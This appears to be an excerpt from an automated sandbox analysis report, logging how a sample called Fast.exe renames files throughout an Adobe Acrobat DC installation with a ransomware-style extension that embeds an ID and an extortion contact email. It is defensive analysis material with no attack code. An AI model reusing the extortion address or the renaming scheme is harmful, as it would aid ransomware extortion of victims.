Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\stopwords.ENU.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Bold.eot.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Light.eot.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Regular.eot.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Bold.woff.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Light.woff.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Regular.woff.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\PDFPrevHndlr.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\PDFSigQFormalRep.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Accessibility.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\adobepdf.xdc.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\AdobePDF417.pmp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\DataMatrix.pmp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\QRCode.pmp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\CompareMarkers.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Pointers.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Faces.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\SignHere.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Standard.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Checkers.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\Words.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\DVA.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\DropboxStorage.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\eBook.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\IA32.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\mip_ClientTelemetry.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\mip_upe_sdk.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\MSRMS.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\Flash.mpp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\MCIMPP.mpp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\WindowsMedia.mpp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\PDDom.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\ReadOutLoud.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\reflow.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\SaveAsRTF.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\SendMail.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Search.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Spelling.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\StorageConnectors.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Updater.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\weblink.api.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\2d.x3d.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\3difr.x3d.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\drvDX9.x3d.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\drvSOFT.x3d.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\MyriadCAD.otf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\tesselate.x3d.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\pmd.cer.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\Microsoft.VCLibs.x86.14.00.appx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Accessibility_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Actions_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\AppCenter_R.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\CCX_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Certificates_R.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\CollectSignatures.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Combine_DelayedPaywall.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Combine_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Comments.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Compare_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\ConvertPDF_Full.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\ConvertPDF_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\CPDF_Full.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\CPDF_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\CreateCustom_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Developer_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Edit_DelayedPaywall.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Edit_R_Exp_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Edit_R_Full.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Edit_R_Menu.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Edit_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\EPDF_Full.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\EPDF_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Forms_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Home.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\FillSign.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\InAppSign.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Index_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Measure.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\MoreTools.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\OptimizePDF_R_CTX.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\OptimizePDF_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Pages_DelayedPaywall.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Pages_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\PrintProduction_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Protect_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Redact_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Review_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\RichMedia_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Scan_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Stamp.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Standards_R_RHP.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\TrackedSend.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\UnifiedShare.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Viewer.aapp.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ScCore.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RTC.der.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\Action01.sequ.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\Action02.sequ.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\Action03.sequ.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\Action04.sequ.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\Action05.sequ.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\Action06.sequ.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\sqlite.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\add_reviewer.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\bl.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\br.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\create_form.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
